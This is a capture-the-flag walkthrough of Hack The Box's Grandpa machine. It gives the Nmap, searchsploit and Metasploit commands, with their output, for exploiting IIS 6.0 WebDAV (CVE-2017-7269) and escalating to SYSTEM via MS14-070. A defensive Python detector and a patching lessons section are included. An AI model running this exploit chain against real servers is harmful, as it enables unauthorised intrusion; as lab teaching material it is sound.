Keep Calm and Hack The Box – Taking Down Grandpa

Mastering penetration testing skills requires practice, and lots of it. While building your own virtual labs is always an option, it can be time consuming to set up realistic scenarios. This is where online platforms like Hack The Box come into play. Hack The Box, or HTB for short, provides a fun gamified environment to legally hack machines and hone your offensive skills.

One of the easier retired machines on HTB is Grandpa. This Windows box showcases a critical vulnerability in IIS 6.0 web servers, CVE-2017-7269, which can be exploited to gain remote code execution. Despite being a lower point value box, it still teaches valuable lessons that can be applied to real-world penetration tests and red team engagements.

In this write-up, we'll walk through the steps needed to compromise Grandpa from start to finish. We'll cover the methodology, tools used, and exploits needed to go from zero initial access to SYSTEM privileges on the box. Let's dive in!

Tools of the Trade

Before starting our attack, we'll need to arm ourselves with a few utilities in our penetration testing toolkit:

  • Nmap – This versatile network scanning tool will help us identify open ports and fingerprint services running on the box
  • Searchsploit – We can use this to search for publicly available exploits and vulnerability details that match versions of software found
  • Metasploit Framework – The most popular penetration testing framework that packs a large collection of exploits and payloads to use
  • Local Exploit Suggester – This handy Metasploit module can quickly highlight missing patches and potential privilege escalation vectors

With our tools prepped and ready, let's move to the first phase of our attack.

Reconnaissance

The initial step in attacking any machine is always reconnaissance. Before we can exploit a target, we need to understand what it's running. A few well-crafted Nmap scans can help light the way.

To kick things off, we'll run a service version detection scan against Grandpa using the following Nmap command:

nmap -sV -sC -p- -oA grandpa 10.10.10.14

Here's a quick breakdown of the flags used:

  • -sV: enables service/version detection to fingerprint services on open ports
  • -sC: runs the default Nmap scripts to further enumerate the services
  • -p-: scans all 65,535 TCP ports instead of just the top 1000
  • -oA: outputs the results in all major formats with a basename of "grandpa"

Our scan returns just a single port open:

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Server Type: Microsoft-IIS/6.0
|   WebDAV type: Unknown
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|_  Server Date: Fri, 11 Sep 2020 15:25:44 GMT

Right off the bat, this tells us the box is running a web server on port 80, specifically Microsoft IIS version 6.0. The web page itself doesn't contain much, just an "Under Construction" message. However, the Nmap HTTP scripts provide some juicy info.

First, it appears the server has WebDAV enabled. WebDAV is an extension of HTTP that allows clients to perform remote content authoring, such as reading and editing files on the web server. The http-methods script lists several WebDAV methods, including PUT and MOVE, as potentially risky methods the server accepts.

Before moving on, we'll try one more Nmap script to see if it can glean any additional details on the WebDAV configuration:

nmap --script http-webdav-scan -p80 10.10.10.14

Unfortunately, this doesn't give us much else to go on. At this point, let's see if Searchsploit turns up any leads.

Seeking Exploits

With the service and version information collected, we can check if any exploits exist for IIS 6.0:

searchsploit iis 6.0

This returns quite a few results, including a very interesting one for a remote code execution vulnerability. We can dig into the details more by appending the Exploit-DB ID to the command:

searchsploit -x 41738

The exploit code itself provides insightful details in the comments:

# Exploit Title: Microsoft IIS WebDav ScStoragePathFromUrl Overflow
# Date: 26-05-2017
# Exploit Author: Zhiniang Peng and Chen Wu
# Vendor Homepage: https://www.iis.net/
# Version: Version 6.0
# CVE: CVE-2017-7269
# Reference: https://github.com/edwardz246003/IIS_exploit

So it appears this is exploiting CVE-2017-7269, a buffer overflow in the ScStoragePathFromUrl function of the WebDAV module. The vulnerability is due to improper validation of long headers in PROPFIND requests. Successful exploitation results in remote code execution in the security context of the web server process.

At the time, this was a major vulnerability as it affected all versions of IIS 6.0 in the default configuration. An attacker could gain complete control over unpatched servers, as we'll see shortly.
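From the defender's side, the two observations above (WebDAV methods exposed on a public server, and PROPFIND requests carrying an overlong header) are both visible in the raw HTTP requests a reverse proxy or IDS sees. The following is an added example, not code from the write-up or from any of the tools it uses: it parses constructed sample requests, reports WebDAV methods in use, and flags PROPFIND requests whose header values exceed a size threshold (the threshold and the sample addresses are assumptions).

```python
"""Flag WebDAV exposure and CVE-2017-7269-style requests in raw HTTP.

Added example (not from the write-up). The requests below are constructed
samples, not captured traffic; the size threshold is an assumption.
"""
from typing import Dict, List, Tuple

# WebDAV methods a public-facing server rarely needs; any of these is reported.
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE",
                  "LOCK", "UNLOCK", "SEARCH", "PUT", "DELETE"}
# Legitimate header values are a few hundred bytes at most (assumed limit).
MAX_HEADER_LEN = 1024


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP request into (method, path, lower-cased headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method.upper(), path, headers


def inspect(raw: str) -> List[str]:
    """Return findings for one request; an empty list means nothing notable."""
    method, path, headers = parse_request(raw)
    findings: List[str] = []
    if method in WEBDAV_METHODS:
        findings.append(f"webdav-method {method} {path}")
    for name, value in headers.items():
        if len(value) > MAX_HEADER_LEN:
            findings.append(f"oversized-header {name} len={len(value)}")
    # A PROPFIND with an overlong If: header is the CVE-2017-7269 trigger shape.
    if method == "PROPFIND" and len(headers.get("if", "")) > MAX_HEADER_LEN:
        findings.append("possible-cve-2017-7269")
    return findings


# Constructed samples: a plain page fetch, a normal PROPFIND, and a PROPFIND
# whose If: header is padded far beyond any legitimate size.
SAMPLES = {
    "get": "GET / HTTP/1.1\r\nHost: 10.10.10.14\r\n\r\n",
    "propfind": ("PROPFIND /share HTTP/1.1\r\nHost: 10.10.10.14\r\n"
                 "Depth: 1\r\nContent-Length: 0\r\n\r\n"),
    "overflow": ("PROPFIND / HTTP/1.1\r\nHost: 10.10.10.14\r\n"
                 "If: <http://10.10.10.14/" + "A" * 2000 + ">\r\n\r\n"),
}

if __name__ == "__main__":
    for label, req in SAMPLES.items():
        print(label, inspect(req))
```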

Exploiting WebDAV

Since the vulnerability lies in the WebDAV component, let's see if we can interact with it directly using a tool called davtest.

davtest -url http://10.10.10.14

The results indicate that we can perform GET requests, but the tool wasn't able to successfully upload a file using PUT. We'll likely need to aim for a more direct exploit rather than manually abusing WebDAV methods.

Turning back to Metasploit, we find there is a module already available to exploit CVE-2017-7269. Let's select it and view the options:

msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options

The only required setting is RHOSTS, which we'll set to the IP of Grandpa. We can then kick off the exploit:

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.14
RHOSTS => 10.10.10.14
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

And with that, we receive a session with NT AUTHORITY\Network Service privileges. While not SYSTEM, this is still a foothold we can use to further enumerate the box and pivot to other attacks.

Privilege Escalation

Now that we have an initial shell, we can probe for privilege escalation vulnerabilities. One easy way to do this is with the local_exploit_suggester module:

meterpreter > run post/multi/recon/local_exploit_suggester 
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 38 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The target appears to be vulnerable.

The suggester reports quite a few missing patches that we could potentially exploit. For this box, we'll use MS14-070. This vulnerability allows an attacker to execute arbitrary code with elevated privileges by exploiting a flaw in the TCP/IP IOCTL handler.

We can select the appropriate module and point it at our existing Meterpreter session via the SESSION option:

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use exploit/windows/local/ms14_070_tcpip_ioctl
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set LHOST tun0
LHOST => 10.10.14.21
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > run

The exploit takes a few seconds to run, but afterwards we're greeted with a shiny new shell running with SYSTEM privileges. We can verify this with the handy getuid command:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Capturing the Flags

Now that we have full administrative control over the box, we can seek out those juicy flags. On Windows machines, the user flag is usually located on the user's Desktop. We can browse to the Harry user and snag it:

meterpreter > cd "c:\documents and settings\harry\desktop"
meterpreter > cat user.txt
bdff5ec67c3cff017f2bedc146a5d869

Similarly, the root flag on HTB is conventionally found on the Administrator's desktop:

meterpreter > cd "c:\documents and settings\administrator\desktop"
meterpreter > cat root.txt
9359e905a2c35f861f6a57cecf28bb7b

With that, we've fully compromised the Grandpa machine! We can now pat ourselves on the back for a job well done.

Lessons Learned

While a fairly straightforward box, Grandpa still provides some key takeaways that can be applied to real-world engagements:

  1. Proper patch management is critical. The CVE-2017-7269 and MS14-070 vulnerabilities exploited were both patched years before the release of this box. Staying up-to-date on security updates could have prevented the box from being compromised.

  2. Be mindful of excessive service configurations. While WebDAV has legitimate uses, it's rarely needed on public-facing servers. Unnecessarily exposing WebDAV methods increases the attack surface and enables exploits like this to succeed. Regularly auditing and restricting configurations to only what's essential goes a long way.

  3. Privilege separation is important. Although IIS servers often run under privileged accounts, enforcing stricter user permissions can help contain the damage of an initial compromise. Defense-in-depth measures like this complicate lateral movement and privilege escalation.

  4. Multiple exploits are frequently used in a single attack chain. It's common for attackers to exploit several vulnerabilities in succession, as we saw with the initial access via WebDAV RCE and privilege escalation through the TCP/IP IOCTL handler. Defending against multi-stage attacks requires a comprehensive security approach.

Grandpa may be a simple target, but the techniques used and concepts covered lay a solid foundation for attacking more challenging machines. The basic methodology of reconnaissance, service enumeration, exploitation, and privilege escalation remains the same regardless of the target.

With enough persistence and an analytical mindset, no system is beyond compromise. Through practice on lab environments like Hack The Box, we can hone our offensive tradecraft. As pentesters and red teamers, this allows us to provide better security assessments and ultimately help defend organizations against real adversaries.

Now, go forth and hack all the things (ethically of course)!
